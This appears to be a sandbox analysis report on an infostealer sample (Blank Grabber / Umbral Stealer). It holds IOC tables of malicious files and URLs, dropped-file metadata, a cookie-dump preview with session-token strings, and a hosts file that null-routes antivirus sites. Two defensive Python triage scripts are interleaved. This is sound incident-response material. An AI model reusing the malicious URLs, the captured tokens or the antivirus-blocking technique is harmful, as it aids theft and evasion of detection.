discord.com | cum.exe | Get hash | malicious | Blank Grabber, Umbral Stealer, XWorm | Browse | 162.159.135.232
discord.com | http://discord.openaiproxy.top/ | Get hash | malicious | Unknown | Browse | 162.159.128.233
discord.com | ExtremeInjectorV3.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 162.159.138.232
discord.com | fkgDa.scr.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 162.159.137.232
discord.com | rnZ46.scr.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 162.159.138.232
ip-api.com | Ödeme Talebi_27.08.2024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Doc-Secure6025.pdf | Get hash | malicious | Unknown | Browse | 51.77.64.70
ip-api.com | memreduct.exe | Get hash | malicious | Blank Grabber | Browse | 208.95.112.1
ip-api.com | 172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | RFQ448903423_MAT_HASUE_de_Mexico.js | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | cotización_SIS20240500007257.pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Recibo de envío de DHL_Guía de embarque Doc_PRG211003417144356060.PDF..exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Image Logger Installer.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
ip-api.com | Fatality.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 208.95.112.1
ip-api.com | smss.exe | Get hash | malicious | RMSRemoteAdmin, RDPWrap Tool, xRAT | Browse | 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | Madisonwellsmedia546.pdf | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
CLOUDFLARENETUS | (No subject) (59).eml | Get hash | malicious | HTMLPhisher | Browse | 172.66.47.111
CLOUDFLARENETUS | https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/ | Get hash | malicious | Unknown | Browse | 104.21.20.188
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse | 188.114.96.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 188.114.96.3
CLOUDFLARENETUS | https://t.co/CFNobJuJq9 | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
CLOUDFLARENETUS | http://esc-dot-wind-blade-416540.uk.r.appspot.com | Get hash | malicious | HTMLPhisher | Browse | 188.114.96.3
CLOUDFLARENETUS | Status Update ECKY2.html | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 172.64.41.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
TUT-ASUS | Ödeme Talebi_27.08.2024.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | memreduct.exe | Get hash | malicious | Blank Grabber | Browse | 208.95.112.1
TUT-ASUS | http://stream.crichd.vip/update/sscricket.php | Get hash | malicious | Unknown | Browse | 162.252.214.4
TUT-ASUS | 172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | RFQ448903423_MAT_HASUE_de_Mexico.js | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | cotización_SIS20240500007257.pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | Recibo de envío de DHL_Guía de embarque Doc_PRG211003417144356060.PDF..exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | Image Logger Installer.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
TUT-ASUS | Fatality.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 208.95.112.1
TUT-ASUS | smss.exe | Get hash | malicious | RMSRemoteAdmin, RDPWrap Tool, xRAT | Browse | 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | http://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVUG | Get hash | malicious | Unknown | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | Statement of Account.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | Madisonwellsmedia546.pdf | Get hash | malicious | Unknown | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | RHADAMANTHYS, XWorm | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | instruction_3.pdf lnk.lnk | Get hash | malicious | LummaC | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | ATT09876.htm | Get hash | malicious | HTMLPhisher | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | FedEx Shipping Confirmation.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | VakıfBank - Ödeme onay makbuzu 20240826.pdf.exe | Get hash | malicious | Quasar | Browse | 162.159.136.232
3b5074b1b5d032e5620f69f9f700ff0e | Ödeme Talebi_27.08.2024.exe | Get hash | malicious | AgentTesla | Browse | 162.159.136.232
                            No context
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):235008
                            Entropy (8bit):6.052795731729376
                            Encrypted:false
                            SSDEEP:6144:lloZM+rIkd8g+EtXHkv/iD4Wn0IZHMgPou35EwFyov28e1mpi:noZtL+EP8Wn0IZHMgPou35EwFm1
                            MD5:EABE2A81AA3DABAB25E49EE4B36CE075
                            SHA1:F55B6298F0A8330D90D39E20A73ADB2E828DFD1C
                            SHA-256:5B97B5644019CEC44DDED172780F30B049B82C8E8582A589CE95D7DEC421A686
                            SHA-512:9688119150D3A466D9A12BFC55933D367104747A2CF319467A78DFCF975361C9E2727F76EFE380DB9D0C92C39DC4B0241BFB444E965E92720C9EDCF42C1D18FE
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, Author: Joe Security
                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, Author: ditekSHen
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 79%
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):1965
                            Entropy (8bit):5.377802142292312
                            Encrypted:false
                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                            MD5:582A844EB067319F705A5ADF155DBEB0
                            SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                            SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                            SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                            Malicious:true
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):40960
                            Entropy (8bit):0.8553638852307782
                            Encrypted:false
                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                            MD5:28222628A3465C5F0D4B28F70F97F482
                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                            Malicious:false
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):49152
                            Entropy (8bit):0.8180424350137764
                            Encrypted:false
                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                            MD5:349E6EB110E34A08924D92F6B334801D
                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                            Malicious:false
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                            Category:dropped
                            Size (bytes):28672
                            Entropy (8bit):2.5793180405395284
                            Encrypted:false
                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):674274
                            Entropy (8bit):7.997862207900495
                            Encrypted:true
                            SSDEEP:12288:1CcbecjxMqzgua2dCzcLoJpSGVN1haz4ydBSmaxRZXhfRKg6VeW8A0iLzCTXtf/Q:1N7jgiEzcLoJ5m4ydRuXhfRtA0iL2TXS
                            MD5:342CF0B721D70DA4E56B59BD3258C140
                            SHA1:74AA1CBC50F9625A00AECC1427B619FBCF48A9D6
                            SHA-256:42990A8E4A6F7F1B9E79AB72282303B5CF253875F1A08FFEDA5D0D2FB835074D
                            SHA-512:24D713A4E728A6B6A9F7FD3A6163C2AEBFDC58C42513318F79148B0272DF40111A8B116F05CAA3A755F31A2D4C0BCD21F0C24281B502013011109EA01A787AAF
                            Malicious:false
                            Preview:PK.........p.Y{..........#...Browsers\Cookies\Chrome Cookies.txt.WK....].).#..n....E/x..m.~oZ.....<..5.o..3.$Rn..,....:u..9_...}.......=s.b{.. ...$@.H.Bn2.9...x..<.....S...w].E..'.E..3.[,d....'....i......P...,t.6_Xw2n..>...Y+...sgK.q.n..l.....z...?W.t......e.y.[.'~~.d1`...m....p;h.(......yY?...<.......E.!2......{R...Z^.'.R..2o..+.yya....}.g|.....e.!.....[.R.....s.gx......Ft..].....U.@..7..e.M....~`1=.l...,ca.4..c..C2./.W....8...P<..E..I..7|^'Q......B<,...EM-.u...3......OfS...)..v..H....V9..i.AkZ........).B.n.:....J~...%).....v...v....mJ.:..X..#v...0.mP#..2.#G.,.z.c..S]E.... .......k..e06s.5.[...2x.,.pYO...,..4:..f..>.y..!.YO."...E..A"..v:..&Hr...#...g.O..x1.b.$.#.}...f.&KYD.H.,.Y..7..g-....(c..+.1"4.......~.#H...._}../. B |Z..O...HTB..P.@.-..^..`@;.......v~A.E.b......I..>..I.n.Yx\...q.....'%.".-6..?H.EB..".9?y.NU.!QR...)".h.....E..P.g........1z..2S.Ii..... .c.>#03.....JI...b@.eV..C....\.Y...E..v.....%j.^.x.l..V.{z.........f?..3Z....
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with very long lines (522), with CRLF line terminators
                            Category:dropped
                            Size (bytes):3345
                            Entropy (8bit):5.8601905602672835
                            Encrypted:false
                            SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:NFFRiNEUd7
                            MD5:A3E0FD5B00C49B355B00B3083DA7C5CB
                            SHA1:A809B694054810FE687456F187E5FC2C2CEFA507
                            SHA-256:592564F2EB5C54230CC985CDAB59C4AFD497EA11DC922CC72DF20172556B1354
                            SHA-512:EEB56A85B9200B40F5CBFD0CFEEA2F1E70B1C56F775EE186C5030B6E494C3F72614B8E728AF45BADA3216D74F45CD84FBAF000026A786F92235741D260C13A24
                            Malicious:false
                            Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f
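The dropped "Chrome Cookies.txt" above is in Netscape cookies.txt layout (domain, include-subdomains flag, path, secure flag, expiry, name, value, tab-separated), but the expiry column carries Chrome's raw expires_utc value: 17-digit numbers starting with 13… are microseconds since 1601-01-01, not Unix seconds. The parser below is an added example for triaging such a dump, not code from the report or from the stealer. Its sample lines are constructed to mirror the preview (the cookie values are placeholders, not the exfiltrated ones), and the analysis time is the report's 20:06 CEST converted to UTC.

```python
"""Parse a stealer cookie dump and decode Chrome (WebKit-epoch) expiries.

Added example, not part of the sandbox report. SAMPLE_DUMP is constructed
to match the dropped file's layout; the values are placeholders.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List

# Chrome stores expires_utc as microseconds since 1601-01-01 00:00:00 UTC.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Report's analysis time (2024-08-27 20:06 CEST) expressed in UTC.
ANALYSIS_TIME = datetime(2024, 8, 27, 18, 6, tzinfo=timezone.utc)

# Constructed lines mirroring the preview; expiries copied from the report,
# cookie values replaced with placeholders.
SAMPLE_DUMP = (
    ".google.com\tTRUE\t/\tFALSE\t13356618603686193\tNID\t511=REDACTED\r\n"
    ".support.microsoft.com\tTRUE\t/\tTRUE\t13340887435186329\t.AspNetCore.AuthProvider\tTrue\r\n"
    ".support.microsoft.com\tTRUE\t/signin-oidc\tTRUE\t13340887735359334\t.AspNetCore.OpenIdConnect.Nonce\tREDACTED\r\n"
)


@dataclass
class Cookie:
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: datetime
    name: str
    value: str


def webkit_to_datetime(us: int) -> datetime:
    """Convert a WebKit/Chrome microsecond timestamp to an aware UTC datetime."""
    return WEBKIT_EPOCH + timedelta(microseconds=us)


def parse_cookie_dump(text: str) -> List[Cookie]:
    """Parse tab-separated Netscape-style lines; skip comments and short rows."""
    cookies: List[Cookie] = []
    for raw in text.splitlines():
        if not raw or raw.startswith("#"):
            continue
        fields = raw.split("\t", 6)  # at most 7 fields; value keeps any extra tabs
        if len(fields) != 7:
            continue                 # truncated row: skip rather than guess
        domain, subs, path, secure, expiry, name, value = fields
        cookies.append(Cookie(domain, subs == "TRUE", path, secure == "TRUE",
                              webkit_to_datetime(int(expiry)), name, value))
    return cookies


def unexpired(cookies: List[Cookie], now: datetime) -> List[Cookie]:
    """Cookies still valid at 'now': the sessions an attacker could replay."""
    return [c for c in cookies if c.expires > now]


if __name__ == "__main__":
    for c in parse_cookie_dump(SAMPLE_DUMP):
        state = "valid" if c.expires > ANALYSIS_TIME else "expired"
        print(f"{c.domain:<24} {c.name:<34} expires {c.expires:%Y-%m-%d %H:%M:%S}Z ({state})")
```

Run against the real dump, `unexpired()` gives the list of sessions to invalidate first; for the three expiries visible in the preview, all had already lapsed (April 2024 and October 2023) by the time of analysis, which says more about the age of the sandbox image than about the stealer.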
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):690437
                            Entropy (8bit):7.922979908933762
                            Encrypted:false
                            SSDEEP:12288:l6n5ze89KU6mW0ZbEAeebXFKu4hmKd48GKvcN4/hyzdyeeRzZPaqxh9L:l65zqUdPhEAeebFKu4hDdkKvcN45Mdm7
                            MD5:20C566841EB0980340A1906D47492DA9
                            SHA1:FE5275290CF09F737A34D6B11BBBDB279A278E1B
                            SHA-256:4F087CB21BB174FCDFC56E7889493680CDD219591D6A19BD6FB77FFFDA7A114B
                            SHA-512:86ABBAF26D3707E77FE5FADC5D714CA50E9812D9522999589FB459B1E05407442F6B2003ED2B95A75C1C5169EAAD6207CE983DAEB9DF7095D78D0198621F585D
                            Malicious:false
                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w..Gy....;7...5......?.=.d{...r...@9.$h@d0Ad....D.."Bd1..5...P..DhE$..... ...z........[..}].UUO=U..k7...z..~...........]~........wr..K..'&.wR...?.D.g...~.\.....9a....I..=\...b.}...........1..?.i.......&b.8..H...}G0s......Xf.j..y....b.;........................E...?.......Z0.w...]w..w.9..;.....E^?....=......1s.m..[.E...Z.7.3o...7~w$.*f..;.o..3..f^...@.u..X...,.].\..y.-#Y..W}....3.......B...b.......5.>^f...Y^zc...4..w..nH..\.V....|.sX....3/........./.X...c...r].8s.i%...e9.53y~..........Z.k../.....A.v../.1.<8.q..i..*..+.g..._Sb+..&.xQ.90......N3.]...^.z.\Q..W.(....X.O...k..*.+..<...~o.....ey.....c3.y.5.a.>W....}[./.;..uy...e]l...U..}s.siW.............3....-..yI......r.....v.F.[....{..f|--1.W.ue..W.yii5Vl..y.........`...-.g.....].....=..l.K.u...].;....4....r..y3..;\....}X.K.....XK.j..f.<.S^.[....(-.!?7..)O.g..[.k..s.....>?.............,
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with CRLF, LF line terminators
                            Category:dropped
                            Size (bytes):2223
                            Entropy (8bit):4.573013811987098
                            Encrypted:false
                            SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                            MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                            SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                            SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                            SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                            Malicious:true
                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.
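The hosts file flagged as malicious above keeps Microsoft's stock comment block and appends 0.0.0.0 entries for AV and scanning-vendor domains (virustotal.com, avast.com, totalav.com, scanguard.com and more), so that name resolution for those sites fails on the victim. The script below is an added example of a triage check for that technique, not code from the report or the malware. Its sample hosts file is constructed from the preview, the vendor list is the one visible in the preview (extend it for your environment), and the registrable-domain helper is a deliberately crude last-two-labels approximation (assumption; use a public-suffix list in production).

```python
"""Flag hosts-file entries that sinkhole security-vendor domains.

Added example for triaging a modified hosts file (on Windows:
%SystemRoot%\\System32\\drivers\\etc\\hosts). SAMPLE_HOSTS is constructed
from the sandbox report's preview and is not the dropped file itself.
"""
from typing import Dict, List, Tuple

# Constructed excerpt mirroring the dropped file: stock header, then appended
# null-route entries, plus one benign developer override (assumed) for contrast.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost
0.0.0.0 virustotal.com
0.0.0.0 www.virustotal.com
0.0.0.0 avast.com
0.0.0.0 www.avast.com
0.0.0.0 totalav.com
0.0.0.0 www.totalav.com
0.0.0.0 scanguard.com
127.0.0.1 dev.internal.example   # benign override, not a vendor domain
"""

# Addresses that make a name unreachable: null route or loopback.
SINKHOLE_ADDRS = {"0.0.0.0", "127.0.0.1", "::1", "::"}

# Vendor domains seen in the report preview; extend with your own list.
VENDOR_DOMAINS = {"virustotal.com", "avast.com", "totalav.com", "scanguard.com"}


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs, ignoring comments and blank lines."""
    entries: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing and full-line comments
        if not line:
            continue
        addr, *names = line.split()           # one address, one or more names
        for name in names:
            entries.append((addr, name.lower()))
    return entries


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels). Assumption: adequate for the list above."""
    labels = host.strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def find_sinkholed_vendors(text: str) -> Dict[str, List[str]]:
    """Map each sinkholed vendor domain to the exact hostnames that were blocked."""
    hits: Dict[str, List[str]] = {}
    for addr, name in parse_hosts(text):
        if addr in SINKHOLE_ADDRS and registrable(name) in VENDOR_DOMAINS:
            hits.setdefault(registrable(name), []).append(name)
    return hits


if __name__ == "__main__":
    for dom, names in sorted(find_sinkholed_vendors(SAMPLE_HOSTS).items()):
        print(f"{dom}: {', '.join(names)}")
```

A hit from this check is a strong signal on its own: legitimate software has no reason to null-route a scanning vendor, and the same edit also breaks signature updates for any product that resolves its update hosts through the hosts file.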
